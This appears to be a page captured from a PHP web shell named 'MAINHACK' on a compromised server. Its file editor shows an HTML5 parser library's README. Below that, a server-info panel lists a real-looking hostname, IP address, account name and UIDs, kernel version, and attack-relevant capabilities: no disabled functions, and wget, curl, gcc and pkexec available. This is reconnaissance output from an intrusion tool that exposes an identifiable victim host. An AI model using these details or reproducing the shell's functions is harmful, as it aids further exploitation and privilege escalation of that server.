[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: README.md
# The Parser Model The parser model here follows the model in section [8.2.1](http://www.w3.org/TR/2012/CR-html5-20121217/syntax.html#parsing) of the HTML5 specification, though we do not assume a networking layer. [ InputStream ] // Generic support for reading input. || [ Scanner ] // Breaks down the stream into characters. || [ Tokenizer ] // Groups characters into syntactic || [ Tree Builder ] // Organizes units into a tree of objects || [ DOM Document ] // The final state of the parsed document. ## InputStream This is an interface with at least two concrete implementations: - StringInputStream: Reads an HTML5 string. - FileInputStream: Reads an HTML5 file. ## Scanner This is a mechanical piece of the parser. ## Tokenizer This follows section 8.4 of the HTML5 spec. It is (roughly) a recursive descent parser. (Though there are plenty of optimizations that are less than purely functional. ## EventHandler and DOMTree EventHandler is the interface for tree builders. Since not all implementations will necessarily build trees, we've chosen a more generic name. The event handler emits tokens during tokenization. The DOMTree is an event handler that builds a DOM tree. The output of the DOMTree builder is a DOMDocument. ## DOMDocument PHP has a DOMDocument class built-in (technically, it's part of libxml.) We use that, thus rendering the output of this process compatible with SimpleXML, QueryPath, and many other XML/HTML processing tools. For cases where the HTML5 is a fragment of a HTML5 document a DOMDocumentFragment is returned instead. This is another built-in class.
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.77 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002